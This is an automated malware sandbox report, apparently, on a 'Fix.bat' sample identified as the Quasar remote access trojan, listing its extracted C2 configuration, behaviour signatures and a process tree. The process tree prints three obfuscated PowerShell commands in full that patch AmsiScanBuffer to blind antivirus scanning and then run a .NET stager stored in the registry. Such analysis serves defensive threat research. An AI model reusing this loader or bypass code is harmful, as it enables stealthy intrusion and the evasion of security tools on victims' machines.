Analysis

  • max time kernel
    300s
  • max time network
    208s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-05-2024 19:02

General

  • Target

    Fix.bat

  • Size

    621B

  • MD5

    e235e723f57a72ef725306c3e14d4726

  • SHA1

    9b2153053f8e89c300e32da5df32e9b990594aac

  • SHA256

    aebe0bafeb12706e614a45f2df40518d32d502093517ce95e2d3c1bbfd64ca67

  • SHA512

    0a4eda531be3904ae944d2c1c43755921cde4333a8e9d6bee6669e3de73b6c7859bb7ab3aa7a712fa2085d3fa1fb1d1ed14e5d6ed488a10bd2f6ab6ed049d25e

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

RPad

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-okPqrmZ8kNVUcS4Rp0

Attributes
  • encryption_key

    XmcBnPuLlN1e8SHIRR1z

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-LOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:336
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{6b98a3ba-0d63-4db8-9e82-cfbfc2d04a29}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3368
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{4f57131d-acf6-435e-87cc-dc93f44808b6}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:220
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{e2e4e52d-949c-4bf7-9b33-b012809df131}
          2⤵
            PID:2216
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
            PID:672
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:952
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:416
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:656
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:868
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1040
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1088
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:3036
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZzqpaqcSBnrT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qMRvYQxVScxnqX,[Parameter(Position=1)][Type]$DbEqhkFLNK)$nsNpTltMhLn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'T'+'y'+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+'e'+''+[Char](97)+''+'l'+'ed'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+'A'+''+'u'+''+[Char](116)+'oCl'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nsNpTltMhLn.DefineConstructor(''+'R'+''+[Char](84)+'Sp'+'e'+''+'c'+'i'+'a'+''+'l'+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+'d'+'e'+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$qMRvYQxVScxnqX).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+'m'+'e'+[Char](44)+''+'M'+''+'a'+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$nsNpTltMhLn.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+'ide'+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+','+''+[Char](86)+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$DbEqhkFLNK,$qMRvYQxVScxnqX).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'ge'+'d'+'');Write-Output $nsNpTltMhLn.CreateType();}$LSgFxOaFlAScm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'Wi'+[Char](110)+''+'3'+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+''+'f'+'e'+'N'+'a'+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+'h'+'o'+''+[Char](100)+''+[Char](115)+'');$QXMazkTOmigOwI=$LSgFxOaFlAScm.GetMethod(''+'G'+'etP'+[Char](114)+''+'o'+''+'c'+'Ad'+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+'a'+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IboAcloUaaduVeQsACp=ZzqpaqcSBnrT @([String])([IntPtr]);$kZnRNMWztoNXTIaiskjwMa=ZzqpaqcSBnrT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$flewVmahyHt=$LSgFxOaFlAScm.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'l'+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'er'+[Char](110)+'e'+'l'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+'ll')));$pZTVdhcvnVduFc=$QXMazkTOmigOwI.Invoke($Null,@([Object]$flewVmahyHt,[Object](''+[Char](76)+'oa'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$RyUSIOmDAmpnhxOTF=$QXMazkTOmigOwI.Invoke($Null,@([Object]$flewVmahyHt,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$mkRhfvN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pZTVdhcvnVduFc,$IboAcloUaaduVeQsACp).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$xtzyEzpKnlpxgyTgx=$QXMazkTOmigOwI.Invoke($Null,@([Object]$mkRhfvN,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+'f'+[Char](101)+''+'r'+'')));$vYhSdMJkvG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RyUSIOmDAmpnhxOTF,$kZnRNMWztoNXTIaiskjwMa).Invoke($xtzyEzpKnlpxgyTgx,[uint32]8,4,[ref]$vYhSdMJkvG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xtzyEzpKnlpxgyTgx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RyUSIOmDAmpnhxOTF,$kZnRNMWztoNXTIaiskjwMa).Invoke($xtzyEzpKnlpxgyTgx,[uint32]8,0x20,[ref]$vYhSdMJkvG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+'E').GetValue('$'+[Char](55)+''+'7'+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1592
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ScFyoeWuUeGR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zZmgxnMADZDFMD,[Parameter(Position=1)][Type]$zzqYBITArY)$gZOExmmvHsJ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+'c'+'tedD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+''+'r'+''+'y'+'Modul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'Type',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+','+[Char](80)+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+'la'+[Char](115)+'s,'+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+'l'+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$gZOExmmvHsJ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+'N'+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+'ub'+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$zZmgxnMADZDFMD).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$gZOExmmvHsJ.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+'S'+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'Vi'+'r'+'t'+[Char](117)+''+'a'+'l',$zzqYBITArY,$zZmgxnMADZDFMD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+'e'+''+','+''+'M'+'an'+'a'+'g'+[Char](101)+''+[Char](100)+'');Write-Output $gZOExmmvHsJ.CreateType();}$GRekNZzPwYKiD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+'so'+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+'s');$UNgRdpllOOGoDe=$GRekNZzPwYKiD.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+'d'+''+'d'+''+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c,St'+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GVEpAkoBrkJjWCLZUKa=ScFyoeWuUeGR @([String])([IntPtr]);$mYJbrzqxBAnWNBhnnWHkgc=ScFyoeWuUeGR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IyilwnrJeWS=$GRekNZzPwYKiD.GetMethod(''+[Char](71)+'e'+[Char](116)+'M'+'o'+'du'+'l'+'e'+'H'+'andl'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+'d'+'l'+''+'l'+'')));$YYfqfofTSWmjOf=$UNgRdpllOOGoDe.Invoke($Null,@([Object]$IyilwnrJeWS,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+'i'+[Char](98)+'r'+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$JabjiaIuufBJaaWUK=$UNgRdpllOOGoDe.Invoke($Null,@([Object]$IyilwnrJeWS,[Object](''+[Char](86)+'irtu'+[Char](97)+''+'l'+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$vcYtWLX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YYfqfofTSWmjOf,$GVEpAkoBrkJjWCLZUKa).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+'l');$vhyCeINYwbAJmOzOG=$UNgRdpllOOGoDe.Invoke($Null,@([Object]$vcYtWLX,[Object](''+'A'+'ms'+[Char](105)+''+'S'+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$ptWoBtGVAL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JabjiaIuufBJaaWUK,$mYJbrzqxBAnWNBhnnWHkgc).Invoke($vhyCeINYwbAJmOzOG,[uint32]8,4,[ref]$ptWoBtGVAL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vhyCeINYwbAJmOzOG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JabjiaIuufBJaaWUK,$mYJbrzqxBAnWNBhnnWHkgc).Invoke($vhyCeINYwbAJmOzOG,[uint32]8,0x20,[ref]$ptWoBtGVAL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('$'+'7'+''+[Char](55)+''+'s'+''+'t'+'a'+'g'+'er')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4668
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:4816
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OsclgELuOhGg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HJWjbvyboOzOdP,[Parameter(Position=1)][Type]$oALwqlRcFU)$DQmEgfEtWLy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+'f'+''+'l'+''+'e'+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+'e'+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+'r'+''+'y'+'M'+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+'l'+[Char](101)+'g'+'a'+'teT'+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+'ed'+','+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+'A'+'u'+''+'t'+'o'+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$DQmEgfEtWLy.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+'N'+'a'+''+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+'u'+'b'+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$HJWjbvyboOzOdP).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'ti'+'m'+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$DQmEgfEtWLy.DefineMethod('In'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+'g,'+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'lo'+'t'+''+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+'u'+'a'+[Char](108)+'',$oALwqlRcFU,$HJWjbvyboOzOdP).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $DQmEgfEtWLy.CreateType();}$akIsHeBWgncPg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Syst'+[Char](101)+''+'m'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+'so'+[Char](102)+''+[Char](116)+''+'.'+'Wi'+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+'o'+[Char](100)+'s');$VtelYOStNXeQtd=$akIsHeBWgncPg.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+'c'+'A'+'dd'+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+'t'+[Char](97)+'t'+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$oQbwkLJmDpiwhtktNrR=OsclgELuOhGg @([String])([IntPtr]);$lvKXzdpYXBBvhIhpjAEDVg=OsclgELuOhGg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NhMoSJbEaKR=$akIsHeBWgncPg.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+'l')));$AMRxvhHZmkpuFG=$VtelYOStNXeQtd.Invoke($Null,@([Object]$NhMoSJbEaKR,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+'L'+'i'+''+[Char](98)+'r'+'a'+'r'+[Char](121)+''+[Char](65)+'')));$ARMhcaWxCyGUyUFxd=$VtelYOStNXeQtd.Invoke($Null,@([Object]$NhMoSJbEaKR,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$HialadU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AMRxvhHZmkpuFG,$oQbwkLJmDpiwhtktNrR).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$OFIuTmPvgEwkvnqLY=$VtelYOStNXeQtd.Invoke($Null,@([Object]$HialadU,[Object]('A'+[Char](109)+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+'n'+[Char](66)+'uf'+[Char](102)+'e'+[Char](114)+'')));$fKTJBLZpob=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ARMhcaWxCyGUyUFxd,$lvKXzdpYXBBvhIhpjAEDVg).Invoke($OFIuTmPvgEwkvnqLY,[uint32]8,4,[ref]$fKTJBLZpob);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$OFIuTmPvgEwkvnqLY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ARMhcaWxCyGUyUFxd,$lvKXzdpYXBBvhIhpjAEDVg).Invoke($OFIuTmPvgEwkvnqLY,[uint32]8,0x20,[ref]$fKTJBLZpob);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$7'+[Char](55)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            PID:4472
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                                PID:1248
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1200
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                              1⤵
                              • Drops file in System32 directory
                              PID:1216
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1356
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1368
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1384
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1392
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2676
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                        1⤵
                                          PID:1400
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1556
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1580
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1644
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                1⤵
                                                  PID:1700
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1788
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                    1⤵
                                                      PID:1884
                                                    • C:\Windows\system32\svchost.exe
